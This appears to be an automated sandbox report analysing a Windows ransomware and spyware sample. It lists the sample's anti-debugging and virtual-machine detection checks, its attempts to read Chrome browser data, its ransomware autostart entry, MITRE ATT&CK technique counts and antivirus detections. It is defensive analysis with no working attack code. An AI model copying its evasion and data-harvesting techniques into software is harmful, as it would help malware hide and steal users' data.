Source: explorer.exe, 00000007.00000003.420451429.000000000D19A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}A}
Source: explorer.exe, 00000007.00000003.445129469.000000000D09E000.00000004.00000001.sdmpBinary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001
Source: explorer.exe, 00000007.00000003.420451429.000000000D19A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b1
Source: explorer.exe, 00000004.00000000.244442266.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000004.00000000.241740682.0000000008220000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.384082578.000001D3CFC00000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: SearchUI.exe, 00000010.00000002.365408456.000001D3CABCF000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW@

Anti Debugging:

Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00BA3A90 0_2_00BA3A90
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00BA3B00 0_2_00BA3B00
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00BA3880 rdtsc 0_2_00BA3880
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00C6FA46 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C6FA46
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00C79CB0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00C79CB0
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00C6FA46 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C6FA46
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00C69C26 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C69C26
Source: explorer.exe, 00000004.00000000.211119588.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000004.00000000.212441109.0000000001980000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.212441109.0000000001980000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.212441109.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.212441109.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00BA3680 cpuid 0_2_00BA3680
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: GetLocaleInfoA,0_2_00C7B2DF
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00C7555F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00C7555F
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00C793FB __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_00C793FB
Source: C:\Users\user\Desktop\bkscEXd86b.exe Code function: 0_2_00BA7A30 GetStdHandle,GetFileType,_vswprintf_s,WriteFile,MultiByteToWideChar,_vswprintf_s,GetVersion,RegisterEventSourceW,ReportEventW,DeregisterEventSource,MessageBoxW,0_2_00BA7A30
Source: C:\Users\user\Desktop\bkscEXd86b.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: SearchUI.exe, 00000010.00000002.394743902.000001DBD14D0000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Windows Defender\MSASCui.exe

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\bkscEXd86b.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\previews_opt_out.db
Source: C:\Users\user\Desktop\bkscEXd86b.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\chrome_shutdown_ms.txt
Source: C:\Users\user\Desktop\bkscEXd86b.exe File opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\settings.dat

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Windows Service 13 | Windows Service 13 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping 1 | System Time Discovery 2 | Remote Services | Archive Collected Data 111 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
Default Accounts | Service Execution 12 | Browser Extensions 1 | Process Injection 2 | Obfuscated Files or Information 4 | Input Capture 1 | File and Directory Discovery 4 | Remote Desktop Protocol | Man in the Browser 1 | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Registry Run Keys / Startup Folder 1 | Registry Run Keys / Startup Folder 1 | Software Packing 1 | Security Account Manager | System Information Discovery 34 | SMB/Windows Admin Shares | Data from Local System 1 | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading 1 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture 1 | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 3 | LSA Secrets | Security Software Discovery 41 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 2 | Cached Domain Credentials | Virtualization/Sandbox Evasion 3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Hidden Files and Directories 1 | DCSync | Process Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
bkscEXd86b.exe | 1% | Virustotal | | Browse
bkscEXd86b.exe | 11% | Metadefender | | Browse
bkscEXd86b.exe | 43% | ReversingLabs | Win32.Ransomware.Encoder |
bkscEXd86b.exe | 100% | Joe Sandbox ML | |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
https://mths.be/fromcodepoint | 0% | Virustotal | | Browse
https://mths.be/fromcodepoint | 0% | Avira URL Cloud | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
https://aefd.nelreports.net/api/report?catHTTP/1.1 | 0% | Avira URL Cloud | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
http://facebook.github.io/react/docs/error-decoder.html?invariant | 0% | Virustotal | | Browse
http://facebook.github.io/react/docs/error-decoder.html?invariant | 0% | Avira URL Cloud | safe |
https://aefd.nelreports.ne | 0% | Avira URL Cloud | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
https://aefd.nelreports.net/api/report?cat=bingaot | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
https://aefd.nelreports.net/api/report?cat=bingrms | 0% | Avira URL Cloud | safe |

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmp | false | | high
http://schemas.live.com/Web/1bet | SearchUI.exe, 00000010.00000002.360813914.000001D3C88B2000.00000004.00000001.sdmp | false | | high
http://www.tiro.com | SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmp | false | | high
https://mths.be/fromcodepoint | SearchUI.exe, 00000010.00000003.314210472.000001DBD0760000.00000004.00000001.sdmp, SearchUI.exe, 0000001C.00000003.435616084.0000015F35883000.00000004.00000001.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/spartan/dhp | SearchUI.exe, 00000010.00000002.386080523.000001D3CFEA8000.00000004.00000001.sdmp | false | | high
https://outlook.office.com/ | SearchUI.exe, 00000010.00000002.393819543.000001DBD0FD0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392775499.000001DBD0C35000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392749175.000001DBD0C24000.00000004.00000001.sdmp | false | | high
https://www.msn.com/spartan/ntp | SearchUI.exe, 00000010.00000002.386080523.000001D3CFEA8000.00000004.00000001.sdmp | false | | high
https://www.msn.com/spartan/ntpC: | SearchUI.exe, 0000001C.00000003.444095457.0000015734983000.00000004.00000001.sdmp | false | | high
http://www.sajatypeworks.com | explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://aefd.nelreports.net/api/report?catHTTP/1.1 | SearchUI.exe, 0000001C.00000003.440038340.0000015F35845000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://fontfabrik.com | explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://outlook.office.com/User.ReadWrite | SearchUI.exe, 00000010.00000002.393819543.000001DBD0FD0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392775499.000001DBD0C35000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392749175.000001DBD0C24000.00000004.00000001.sdmp | false | | high
https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/ | SearchUI.exe, 00000010.00000002.404559929.000001DBD317C000.00000004.00000001.sdmp | false | | high
https://api.msn.com/news/feed?m | SearchUI.exe, 00000010.00000002.362630751.000001D3C89B1000.00000004.00000001.sdmp | false | | high
https://substrate.office.com/api/v2.0/Users( | SearchUI.exe, 00000010.00000002.393819543.000001DBD0FD0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392775499.000001DBD0C35000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392749175.000001DBD0C24000.00000004.00000001.sdmp | false | | high
https://substrate.office.com/profile/v0/users/ | SearchUI.exe, 00000010.00000002.393819543.000001DBD0FD0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392775499.000001DBD0C35000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.392749175.000001DBD0C24000.00000004.00000001.sdmp | false | | high
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmp | false | URL Reputation: safe
                              unknown
                              https://api.msn.com/news/feed?market=en-us&query=SearchUI.exe, 00000010.00000002.399294977.000001DBD1939000.00000004.00000001.sdmpfalse
                                high
                                http://www.fonts.comexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.sandoll.co.krexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.sakkal.comexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://facebook.github.io/react/docs/error-decoder.html?invariantSearchUI.exe, 00000010.00000002.402422907.000001DBD1FA0000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000003.315552702.000001DBD10D5000.00000004.00000001.sdmp, SearchUI.exe, 0000001C.00000003.471307339.0000015F3591D000.00000004.00000001.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.fontbureau.comexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                      high
                                      https://www.openssl.org/docs/faq.html....................cryptobkscEXd86b.exe, 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmpfalse
                                        high
                                        https://www.openssl.org/docs/faq.htmlbkscEXd86b.exe, 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmpfalse
                                          high
                                          https://onedrive.live.comSearchUI.exe, 00000010.00000002.398688297.000001DBD18B0000.00000004.00000001.sdmpfalse
                                            high
                                            https://aefd.nelreports.neSearchUI.exe, 00000010.00000003.314054866.000001DBD0CB8000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.msn.com/news?ocid=SearchUI.exe, 00000010.00000002.398360766.000001DBD1870000.00000004.00000001.sdmp, SearchUI.exe, 00000010.00000002.362630751.000001D3C89B1000.00000004.00000001.sdmpfalse
                                              high
                                              http://schema.org/reminderSearchUI.exe, 00000010.00000002.360389895.000001D3C8829000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.carterandcone.comlexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                                  high
                                                  https://substrate.office.comSearchUI.exe, 00000010.00000002.399079858.000001DBD1910000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                                      high
                                                      https://aefd.nelreports.net/api/report?cat=bingaotSearchUI.exe, 0000001C.00000003.470980310.0000015F358EE000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://schemas.live.com/Web/SearchUI.exe, 00000010.00000002.382569753.000001D3CED5D000.00000004.00000001.sdmp, SearchUI.exe, 0000001C.00000003.444095457.0000015734983000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.245472359.0000000008B46000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.381017627.000001D3CD176000.00000002.00000001.sdmpfalse
                                                          high
                                                          https://aefd.nelreports.net/api/report?cat=bingrmsSearchUI.exe, 0000001C.00000003.470980310.0000015F358EE000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://pf.directory.live.com/profile/profile.asmxModuleSearchUI.exe, 00000010.00000002.360389895.000001D3C8829000.00000004.00000001.sdmpfalse
                                                            high

                                                            Contacted IPs

                                                            Public

                                                            IP | Domain | Country | Flag | ASN | ASN Name | Malicious

                                                            Private

                                                            IP
                                                            192.168.2.1

                                                            General Information

                                                            Joe Sandbox Version:31.0.0 Emerald
                                                            Analysis ID:367680
                                                            Start date:11.03.2021
                                                            Start time:23:56:11
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 13m 4s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Sample file name:bkscEXd86b.bin (renamed file extension from bin to exe)
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:37
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:3
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal76.rans.spyw.evad.winEXE@9/201@0/1
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 99.8% (good quality ratio 89.1%)
                                                            • Quality average: 73.9%
                                                            • Quality standard deviation: 33.1%
                                                            HCA Information:
                                                            • Successful, ratio: 52%
                                                            • Number of executed functions: 95
                                                            • Number of non-executed functions: 74
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Override analysis time to 240s for sample files taking high CPU consumption
                                                            Warnings:
                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, wermgr.exe, backgroundTaskHost.exe, audiodg.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe, mobsync.exe
                                                            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 40.88.32.150, 52.147.198.201, 8.248.113.254, 8.248.139.254, 8.248.119.254, 8.248.145.254, 8.248.143.254, 20.190.160.132, 20.190.160.2, 20.190.160.136, 20.190.160.69, 20.190.160.134, 20.190.160.67, 20.190.160.71, 20.190.160.8, 51.104.144.132, 52.255.188.83, 104.43.139.144, 23.218.208.56
                                                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, skypedataprdcoleus15.cloudapp.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, ams2.current.a.prd.aadg.trafficmanager.net
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                            • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                            • Report size getting too big, too many NtReadFile calls found.
                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                            • Report size getting too big, too many NtWriteFile calls found.
                                                            • Too many dropped files, some of them have not been restored

                                                            Simulations

                                                            Behavior and APIs

                                                            Time | Type | Description
                                                            23:57:23 | API Interceptor | 1656x Sleep call for process: explorer.exe modified
                                                            23:57:48 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.CRYPT
                                                            23:58:14 | API Interceptor | 1x Sleep call for process: OpenWith.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            No context

                                                            Domains

                                                            No context

                                                            ASN

                                                            No context

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\$Recycle.Bin\S-1-5-18\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):129
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkR:Yr
                                                            MD5:73C804ED1D6216DA1C49EA4CDED846CC
                                                            SHA1:A61AECBE0691F04F4C4DAE8770187C24F1EF0FE9
